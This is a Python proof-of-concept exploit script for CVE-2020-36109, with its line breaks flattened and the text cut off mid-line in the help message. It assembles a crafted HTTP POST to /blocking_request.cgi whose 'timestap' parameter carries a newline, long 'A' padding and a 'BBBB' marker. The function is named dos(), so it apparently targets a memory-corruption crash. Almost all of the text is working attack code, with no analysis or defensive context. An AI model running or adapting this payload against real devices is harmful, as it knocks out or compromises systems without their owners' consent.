#!/usr/bin/env python import socket import sys import time import hexdump CVE = "CVE-2020-36109" HOST = "127.0.0.1" PORT = 80 def recvuntil(s,timeout=5): check_lst = ["
","\x0a",""] check_str = "{}\x0d\x0a".format("\x0d\x0a".join(check_lst)) data = '' tmp_data = '1' try : while tmp_data != '' : s.settimeout(timeout) tmp_data = s.recv(1024*8).decode('utf-8') data += tmp_data except socket.timeout : pass done = True if data.endswith(check_str) else False return done, data def header(): buff = "" buff += "POST /blocking_request.cgi HTTP/1.1\r\n" buff += "Host: {}:{}\r\n".format(HOST, PORT) buff += "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n" buff += "Accept: */*\r\n" buff += "Accept-Language: en-US,en;q=0.5\r\n" buff += "Accept-Encoding: gzip, deflate\r\n" buff += "Connection: keep-alive\r\n" buff += "Referer: http://{}:{}/\r\n".format(HOST, PORT) buff += "Sec-GPC: 1\r\n" buff += "Origin: http://{}:{}\r\n".format(HOST, PORT) buff += "Pragma: no-cache\r\n" buff += "Cache-Control: no-cache\r\n" return buff def dos(): buff = header() mac = "mac=%00" timestap = "timestap={}".format( int(time.time()) + 3600 + 5) + "%0a" + "A"*(0x1000-0xc-1) + "BBBB" buff1 = "interval=0&CName=whatever&" + timestap + "&" + mac buff += "Content-Length: {}\r\n".format(len(buff1)) buff += "\r\n" buff += buff1 return buff if sys.argv[1] == "-h" or sys.argv[1] == "--help" : print("# Example usage: 'python3 {}